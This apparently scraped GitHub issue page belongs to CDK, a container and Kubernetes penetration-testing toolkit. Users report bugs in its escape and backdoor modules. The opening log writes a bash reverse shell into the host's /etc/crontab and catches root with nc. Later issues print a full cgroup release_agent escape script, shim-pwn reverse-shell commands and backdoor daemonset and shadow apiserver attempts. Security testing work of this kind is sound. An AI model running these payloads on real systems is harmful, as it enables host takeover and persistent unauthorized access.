2023/10/17 04:25:59 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab 
2023/10/17 04:25:59 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:25:59 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_St8G

2023/10/17 04:25:59 shell script saved to /cdk_cgexp_St8G.sh
2023/10/17 04:26:04 Execute Result: 

 * * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
 
root@79a270635491:/#
root@79a270635491:/# 
root@79a270635491:/# 
root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab; echo hello"
2023/10/17 04:28:43 current cgroup for exploit: memory 
2023/10/17 04:28:43 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello 
2023/10/17 04:28:43 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:28:43 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_ieFr

2023/10/17 04:28:43 shell script saved to /cdk_cgexp_ieFr.sh
2023/10/17 04:28:48 Execute Result: 

 hello
 
root@79a270635491:/#
ubuntu@VM-0-2-ubuntu:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
ubuntu@VM-0-2-ubuntu:~$ 
ubuntu@VM-0-2-ubuntu:~$ nc -lvnp 22334
Listening on 0.0.0.0 22334
Connection received on 127.0.0.1 43058
bash: cannot set terminal process group (29740): Inappropriate ioctl for device
bash: no job control in this shell
root@VM-0-2-ubuntu:~#

Mount-procfs exploit does not work on containerd due to dots in the path

请详细描述你遇到的问题 (Please describe the issue in detail)

Attempting to run the mount-procfs exploit on a k8s cluster using containerd runtime does not work due to the overlayfs mount directories having dots in the paths.

Under Docker the mount paths looks like: workdir=/var/lib/docker/overlay2/d3aa09836e4b0c0f3db172f04f3b9b4a1a247b69de3662f4a5b387615a3373b4/work

Under Containerd they look like: workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/4301/work

The regex in https://github.com/cdk-team/CDK/blob/main/pkg/exploit/mount_procfs.go#L44 does not match on the containerd path due to the dots in the path (only matches on alphanumeric or digit characters), Adding "\." in the allowed characters allows the regex to match the containerd path; however, there may be other valid path characters that also need to be accounted for.

附加信息(Additional Information)

$ ./cdk run mount-procfs /mnt/host_proc hostname
2023/02/21 20:26:30 failed to find docker abs path in /proc/self/mounts

shim-pwn说明文档参数遗漏

利用该exp反弹shell时需要用到reverse参数,说明文档中未提到
./cdk_linux_amd64 run shim-pwn reverse RHOST RPORT

Kubernetes v1.20 开始,K8s 默认删除了 metadata.selfLink

历史上我们的几处代码里,有一个有趣但不算优雅的实现:使用 selfLink 来判断 Kubernetes ApiServer 的返回是否正确。

例如 CDK( github.com/cdk-team/CDK )里 检查 "selfLink": "/api/v1/namespaces/kube-system/pods/process-exporter-qnqwk" ;

但从 Kubernetes v1.20 开始,K8s 默认删除了 metadata.selfLink 字段,需要重启 apiserver 添加 RemoveSelfLink=false 才会有 selfLink。

我还在想有没有更优雅的方式来修复这个问题,毕竟漏洞测试工具要求被测环境修改启动参数是不可能的😂 。

[Exploit k8s-shadow-apiserver] Cannot find kube-apiserver pod in namespace:kube-system, maybe target K8s master node managed by cloud provider, cannot deploy api-server in this environment.

cdk k8s-shadow-apiserver module error

$ ./cdk run k8s-shadow-apiserver default
2023/02/15 08:41:33 getting K8s api-server API addr.
Find K8s api-server in ENV: https://10.96.0.1:443
2023/02/15 08:41:33 trying to find api-server pod in namespace:kube-system
Cannot find kube-apiserver pod in namespace:kube-system, maybe target K8s master node managed by cloud provider, cannot deploy api-server in this environment.

$ kubectl get pods -A
kube-flannel kube-flannel-ds-gkz6b 1/1 Running 0 12d
kube-flannel kube-flannel-ds-s6dnl 1/1 Running 1 (171m ago) 13d
kube-flannel kube-flannel-ds-s84n9 1/1 Running 0 12d
kube-system coredns-567c556887-2jqtm 1/1 Running 1 (171m ago) 13d
kube-system coredns-567c556887-kh49x 1/1 Running 1 (171m ago) 13d
kube-system etcd-ubuntu18 1/1 Running 1 (171m ago) 5h55m
kube-system kube-apiserver-ubuntu18 1/1 Running 7 (171m ago) 13d
kube-system kube-controller-manager-ubuntu18 1/1 Running 18 (171m ago) 13d
kube-system kube-proxy-jmzr2 1/1 Running 1 (171m ago) 13d
kube-system kube-proxy-m88gf 1/1 Running 0 12d
kube-system kube-proxy-r2ghj 1/1 Running 0 12d
kube-system kube-scheduler-ubuntu18 1/1 Running 18 (171m ago) 13d

wiki 无法下载

请详细描述你遇到的问题 (Please describe the issue in detail)

使用命令 git clone https://github.com/cdk-team/CDK.wiki.git
出现以下错误:
Cloning into 'CDK.wiki'...
fatal: unable to access 'https://github.com/cdk-team/CDK.wiki.git/': Recv failure: Connection was reset

expoilt模块下的docker_runc.go的两个问题

  1. ./cdk run runc-pwn "" 命令执行后,在进程中匹配runc会匹配到运行该条命令的进程。所以总会先匹配到self进程,建议把命令改一下,比如 ./cdk run rc-pwn
    image

image

  1. 读取了/proc下的pids后,下图中只把pids遍历一遍就退出了,应该持续监听,直到宿主机再次运行docker exec就可以找到runc了。
    image
    建议在外面再加一个for循环

关于漏洞利用的问题

师傅好,
我理解CDK可以一键收集pod/集群信息。但是关于漏洞利用模块Exploit,例如容器逃逸,我不太清楚如何判断当前容器是否可以进行逃逸。是需要逐个测试吗?还是说可以利用的漏洞会通过信息收集模块得到可执行的CVE编号

Exploit-docker_runc.go的两个问题

  1. 代码48行判断是否是文件夹,if !util.IsDir(f.Name())应改为if !util.IsDir("/proc/" + f.Name())
    截图

  2. 代码93行,Desc()有误
    截图 (1)
    应是./cdk run runc-pwn <shell-cmd>,还有其他好几个模块都有这个问题。

k8s-backdoor-daemonset script fails

请详细描述你遇到的问题 (Please describe the issue in detail)

Note: 提交issue前,请检查你所使用的CDK是否是最新版,有些BUG我们新版本已经修复啦。
Before submitting an issue, please check whether the CDK you are using is the latest version, otherwise there may be some bugs that have been fixed in latest version.

Hi here, I failed to execute k8s-backdoor-daemonset script with the following output:

/ # ./cdk run k8s-backdoor-daemonset default ubuntu
2021/04/05 07:06:51 getting K8s api-server API addr.
        Find K8s api-server in ENV: https://10.233.0.1:443
2021/04/05 07:06:51 trying to deploy daemonset with image:kube-proxy to k8s-app:ubuntu
2021/04/05 07:06:51 api-server response:
{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"the server could not find the requested resource","reason":"NotFound","details":{},"code":404}

Here's my k8s version:

root@node1:/home/ubuntu# kubectl version --short
Client Version: v1.20.5
Server Version: v1.20.5

I noticed that my daemonsets resource is in apps/v1 API version, while CDK sends request to extensions/v1beta1:

root@node1:/home/ubuntu# kubectl api-resources | grep daemonsets
daemonsets                        ds           apps/v1                                true         DaemonSet

CDK/pkg/exploit/k8s_backdoor_daemonset.go

Line 15 in ec5d7e6

var k8sDaemonsetApi = "/apis/extensions/v1beta1/namespaces/kube-system/daemonsets"

And according to this Kubernetes Blog, from v1.16 on, DaemonSet in the extensions/v1beta1 and apps/v1beta2 API versions is no longer served. Migrate to use the apps/v1 API version, available since v1.9.

I guess that's why I failed to execute k8s-backdoor-daemonset script. My solution to this problem is checking version of the sever first (this could be done by sending request to /version, example is below), and then choosing the correct API version based on the server version.

/ # curl -k https://10.233.0.1:443/version
{
  "major": "1",
  "minor": "20",
  "gitVersion": "v1.20.5",
  "gitCommit": "6b1d87acf3c8253c123756b9e61dac642678305f",
  "gitTreeState": "clean",
  "buildDate": "2021-03-18T01:02:01Z",
  "goVersion": "go1.15.8",
  "compiler": "gc",
  "platform": "linux/amd64"
}

By the way, CDK is a fantastic toolkit, thank you!

附加信息(Additional Information)

1、您执行 cdk evaluate --full 的返回结果是?(Full output of your execution of cdk evaluate --full)

$ ./cdk evaluate --full

[Information Gathering - System Info]
2021/04/05 07:13:16 current dir: /
2021/04/05 07:13:16 current user: root uid: 0 gid: 0 home: /root
2021/04/05 07:13:16 alpine alpine 3.13.4 kernel: 5.4.0-70-generic

[Information Gathering - Services]
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_SERVICE_PORT=443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT=tcp://10.233.0.1:443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP_ADDR=10.233.0.1
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP_PORT=443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP_PROTO=tcp
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP=tcp://10.233.0.1:443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_SERVICE_PORT_HTTPS=443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_SERVICE_HOST=10.233.0.1

[Information Gathering - Commands and Capabilities]
2021/04/05 07:13:16 available commands:
        curl,wget,nc,find,ps,vi,mount,fdisk
2021/04/05 07:13:16 Capabilities:
        CapEff: 00000000a80425fb


[Information Gathering - Mounts]

[Information Gathering - Net Namespace]
        container net namespace isolated.

[Information Gathering - Sysctl Variables]
2021/04/05 07:13:16 net.ipv4.conf.all.route_localnet = 1

2021/04/05 07:13:16 You may be able to access the localhost service of the current container node or other nodes.
2021/04/05 07:13:16 CVE-2020-8558: The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue
which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Node setting allows for neighboring hosts to bypass localhost boundary.

[Discovery - K8s API Server]
2021/04/05 07:13:16 checking if api-server allows system:anonymous request.
        api-server forbids anonymous request.
        response:{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403}


[Discovery - K8s Service Account]
        service-account is available
2021/04/05 07:13:16 trying to list namespaces
        success, the service-account have a high authority.
        now you can make your own request to takeover the entire k8s cluster with `./cdk kcurl` command
        good luck and have fun.

[Discovery - Cloud Provider Metadata API]
2021/04/05 07:13:17 failed to dial Alibaba Cloud API.
2021/04/05 07:13:18 failed to dial Azure API.
2021/04/05 07:13:18 failed to dial Google Cloud API.
2021/04/05 07:13:18 failed to dial Tencent Cloud API.

[Information Gathering - Sensitive Files]
        .dockerenv - /.dockerenv
        /serviceaccount - /run/secrets/kubernetes.io/serviceaccount

2、请贴出完整错误信息,可以是命令行输出、软件报错信息、截图等。(Please post the full error message, which can be command line output, software error message, screenshots, etc.)

注意,请贴出完整错误信息,不要只粘贴错误的最后一行!Attention, please post the full error message, don't paste the last line of the error only!

Here's the screenshot of the error message:
image

建议在 check net.ipv4.conf.all.route_localnet 补充对利用所需其他条件的检查

hi, @neargle 师傅,我在本地对 CVE-2020-8558 的复现中发现,如果在 pod 中要访问 host 上的 localhost tcp 服务,除了需要 pod 和 host 的 route_localnet 为 1 之外,还需要以下两个条件之一,来通过 pod 收到 host 回复包之后的源地址检查:

  1. pod 具有 CAP_NET_ADMIN,来修改 pod 中 127.0.0.1 的路由项

  2. /proc/sys/net/ipv4/conf/{all && interfaces}/rp_filter 均为 0(interfaces 不包含 lo),/proc/sys/net/ipv4/conf/{all || interface}/accept_local 为 1

在 Evaluate 功能中的 check net.ipv4.conf.all.route_localnet 可以添加上述两个条件的判断,可以进一步判断是否可以利用。

如果需要我可以晚些时间提交 pr

条件 1 参考的 issue
rp_filter, accept_local 的解释
其他人复现文章

关于cdk中 影子apiserver模块的疑问

在v1.1.1版本之前 因为还有--insecure-port=9443 ,因为k8s弃用之后 cdk也注释掉了,现在的话单靠
--anonymous-auth=true
--authorization-mode=AlwaysAllow
这两个参数 没有办法实现对安全端口的匿名访问,这个利用是不是还得建立在匿名用户高权的情况下?

谢谢!

mount-cgroup无法多次执行命令

请详细描述你遇到的问题 (Please describe the issue in detail)

mount-cgroup无法多次执行命令

root@0a8d085e98bf:/cdk# ./cdk_linux_amd64 run mount-cgroup "whoami"
2022/01/25 02:17:56 user-defined shell payload is whoami
2022/01/25 02:17:56 generate shell exploit with user-input cmd:

whoami

#!/bin/sh
mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq
echo 1 > /tmp/cgrp/cdk_oeq/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd_oeq" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd_oeq
echo "whoami > $host_path/output_oeq" >> /cmd_oeq
chmod a+x /cmd_oeq
sh -c "echo \$\$ > /tmp/cgrp/cdk_oeq/cgroup.procs"
sleep 3
cat /output_oeq

2022/01/25 02:17:56 shell script saved to exploit_oeq.sh
2022/01/25 02:17:59 Execute Shell:./exploit_oeq.sh . failed:
exit status 1

附加信息(Additional Information)

1、根据分析发现,生成的payload脚本中

mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq

由于mount在第一次已经挂载导致命令执行异常 从而影响mkdir -p /tmp/cgrp/cdk_oeq命令的执行

需要修改&&命令连接符 以解决该问题

shim-pwn执行失败

尝试了一下shim-pwn,在容器里执行shim-pwd的exp,报了下面的错误:

debianxxx(@:):~# ./cdk_linux_amd64 run shim-pwn 10.1.1.1 12346
2020/12/30 17:36:09 tring to spawn shell to 10.1.1.1:12346
2020/12/30 17:36:09 try socket: @/containerd-shim/moby/fc3385bd1b56983d7a5fc2997560cc445180cd1130150692171563eed09d8c3d/shim.sock
2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
2020/12/30 17:36:09 try socket: @/containerd-shim/moby/b029461e5e5f7dbca3b6fd89414ac06946d5fb73456000edcc2f9fcc6ef9164c/shim.sock
2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
2020/12/30 17:36:09 try socket: @/containerd-shim/moby/7a77f96e2061f6d5160167400ae59b20d08229a626ff1ef5bdd9e7458e95741f/shim.sock
2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found

docker版本:

Client:
 Version:           18.06.1-ce
 API version:       1.38
 Go version:        go1.10.3
 Git commit:        e68fc7a
 Built:             Tue Aug 21 17:23:18 2018
 OS/Arch:           linux/amd64
 Experimental:      false

Server:
 Engine:
  Version:          18.06.1-ce
  API version:      1.38 (minimum version 1.12)
  Go version:       go1.10.3
  Git commit:       e68fc7a
  Built:            Tue Aug 21 17:22:21 2018
  OS/Arch:          linux/amd64
  Experimental:     false

在复现CVE-2020-14257遇到问题

在复现CVE-2020-15257时遇到问题

我现在想要复现CDK利用漏洞CVE-2020-15257,我的docker版本是

$docker version
Client:
 Version:      18.03.1-ce
 API version:  1.37
 Go version:   go1.9.5
 Git commit:   9ee9f40
 Built:        Thu Apr 26 07:17:20 2018
 OS/Arch:      linux/amd64
 Experimental: false
 Orchestrator: swarm

Server:
 Engine:
  Version:      18.03.1-ce
  API version:  1.37 (minimum version 1.12)
  Go version:   go1.9.5
  Git commit:   9ee9f40
  Built:        Thu Apr 26 07:15:30 2018
  OS/Arch:      linux/amd64
  Experimental: false

API版本是1.3.7,是存在漏洞的版本。

执行以下命令:

docker run -itd --name 14257 --net=host ubuntu /bin/bash
docker cp cdk_linux_amd64 15257:/tmp

然后在容器中:

./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234

现在想向我的攻击机上反弹一个宿主机的shell,但是程序报错,具体信息如下:

root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
2021/06/25 03:01:57 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/25 03:01:57 exploit failed.

看起来像是在$PATH目录下没有找到runc,docker我是通过官网提供的方式安装的,没有额外安装过runc,没有切换过容器的底层运行时。容器能够正常运行说明runc肯定是在系统上的,但是利用失败了。

附加信息

1、 cdk evaluate --full 的返回结果是?【在host内执行】

$ ./cdk_linux_amd64 evaluate --full

[Information Gathering - System Info]
2021/06/24 19:45:23 current dir: /home/xsw/Desktop
2021/06/24 19:45:23 current user: xsw uid: 1000 gid: 1000 home: /home/xsw
2021/06/24 19:45:23 hostname: ubuntu
2021/06/24 19:45:23 debian ubuntu 16.04 kernel: 4.8.0-34-generic

[Information Gathering - Services]
2021/06/24 19:45:23 sensitive env found:
	SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
2021/06/24 19:45:23 service found in process:
	1873	1814	ibus-engine-sim
2021/06/24 19:45:23 service found in process:
	8638	1	dockerd
2021/06/24 19:45:23 service found in process:
	8644	8638	docker-containe
2021/06/24 19:45:23 service found in process:
	9976	8644	docker-containe
2021/06/24 19:45:23 service found in process:
	10501	10470	docker
2021/06/24 19:45:23 service found in process:
	12100	11244	docker
2021/06/24 19:45:23 service found in process:
	12106	8644	docker-containe

[Information Gathering - Commands and Capabilities]
2021/06/24 19:45:23 available commands:
	curl,wget,nc,netcat,docker,find,ps,python,python3,apt,dpkg,ssh,git,vi,capsh,mount,fdisk,gcc,g++,make,base64,python2,python2.7,perl,xterm,sudo
2021/06/24 19:45:23 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	0000000000000000
	CapEff:	0000000000000000
	CapBnd:	0000003fffffffff
	CapAmb:	0000000000000000
	Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:

[Information Gathering - Mounts]
Device:/dev/sda1 Path:/ Filesystem:ext4 Flags:rw,relatime,errors=remount-ro,data=ordered

[Information Gathering - Net Namespace]
	host unix-socket found, seems container started with --net=host privilege.
	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]

[Information Gathering - Sysctl Variables]
2021/06/24 19:45:23 net.ipv4.conf.all.route_localnet = 0

[Discovery - K8s API Server]
2021/06/24 19:45:23 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:

[Discovery - K8s Service Account]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[Discovery - Cloud Provider Metadata API]
2021/06/24 19:45:24 failed to dial Alibaba Cloud API.
2021/06/24 19:45:25 failed to dial Azure API.
2021/06/24 19:45:25 failed to dial Google Cloud API.
2021/06/24 19:45:26 failed to dial Tencent Cloud API.
2021/06/24 19:45:27 failed to dial OpenStack API.
2021/06/24 19:45:27 failed to dial Amazon Web Services (AWS) API.
2021/06/24 19:45:28 failed to dial ucloud API.

[Information Gathering - Sensitive Files]
	/.bashrc - /etc/skel/.bashrc
	/docker.sock - /etc/systemd/system/sockets.target.wants/docker.socket
	/.bash_history - /home/xsw/.bash_history
	/.bashrc - /home/xsw/.bashrc
	.git/ - /home/xsw/metarget/.git/HEAD
	.git/ - /home/xsw/metarget/.git/branches
	.git/ - /home/xsw/metarget/.git/config
	.git/ - /home/xsw/metarget/.git/description
	.git/ - /home/xsw/metarget/.git/hooks
	.git/ - /home/xsw/metarget/.git/index
	.git/ - /home/xsw/metarget/.git/info
	.git/ - /home/xsw/metarget/.git/logs
	.git/ - /home/xsw/metarget/.git/objects
	.git/ - /home/xsw/metarget/.git/packed-refs
	.git/ - /home/xsw/metarget/.git/refs
	/docker.sock - /lib/systemd/system/docker.socket
	/docker.sock - /run/docker.sock
	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/docker.socket.dsh-also
	/docker.sock - /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket

[Information Gathering - ASLR]
2021/06/24 19:45:49 /proc/sys/kernel/randomize_va_space file content: 2
2021/06/24 19:45:49 ASLR is enabled.

[Information Gathering - Cgroups]
2021/06/24 19:45:49 /proc/1/cgroup file content:
	11:pids:/init.scope
	10:cpuset:/
	9:hugetlb:/
	8:memory:/init.scope
	7:devices:/init.scope
	6:freezer:/
	5:cpu,cpuacct:/init.scope
	4:perf_event:/
	3:net_cls,net_prio:/
	2:blkio:/init.scope
	1:name=systemd:/init.scope

2、完整错误信息

root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
2021/06/25 03:01:57 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/25 03:01:57 exploit failed.

[Exploit] Implement actual CAP_SYS_MODULE escape in CDK

From: @nikitastupin in #20

The reason why I didn't implement actual CAP_SYS_MODULE escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it. Given how many kernel versions and architectures out there I see several options:

  • To make detailed instructions on how to build kernel module for arbitrary kernel version and architecture and put them to CDK.
  • To prebuilt kernel module for most popular distributions (e.g. Ubuntu 20.04) include them in CDK binary and leave note on how to build kernel module for other kernel versions.

Great thanks to Nikita.

建议修改一些内容,比如可以指定apiserver的url

在最近的项目中,发现一个kubenets未授权访问的端口,但是目标url不在pods环境变量中,所以导致后续很多功能无法使用。

func ApiServerAddr() (string, error) {
	protocol := ""
	host, port := os.Getenv("KUBERNETES_SERVICE_HOST"), os.Getenv("KUBERNETES_SERVICE_PORT")
	if len(host) == 0 || len(port) == 0 {
		text := "err: cannot find kubernetes api host in ENV"
		return "", errors.New(text)
	}
	if port == "8080" || port == "8001" {
		protocol = "http://"
	} else {
		protocol = "https://"
	}

	return protocol + net.JoinHostPort(host, port), nil
}

建议将这里改的更灵活一点

k8s-shadow-apiserver 返回包判断有问题

请详细描述你遇到的问题 (Please describe the issue in detail)

使用cdk部署影子api server时,代码端判断selfLink,但是podlist里面没有该字段
k8s版本1.20.6

Note: 提交issue前,请检查你所使用的CDK是否是最新版,有些BUG我们新版本已经修复啦。
Before submitting an issue, please check whether the CDK you are using is the latest version, otherwise there may be some bugs that have been fixed in latest version.

2、请贴出完整错误信息,可以是命令行输出、软件报错信息、截图等。(Please post the full error message, which can be command line output, software error message, screenshots, etc.)

./cdk run k8s-shadow-apiserver default

image
image
注意,请贴出完整错误信息,不要只粘贴错误的最后一行!Attention, please post the full error message, don't paste the last line of the error only!

[doc] document about thin version and upx version

需要一个解释说明各 release binary 区别的文档(备忘,近期编写)。

In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in source code and cut a few exploits to make the binary lighter, just a 2MB file, but contains 90% of CDK functions, you may also pick up useful exploits in our CDK source code to build your own lightweight binary.

image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.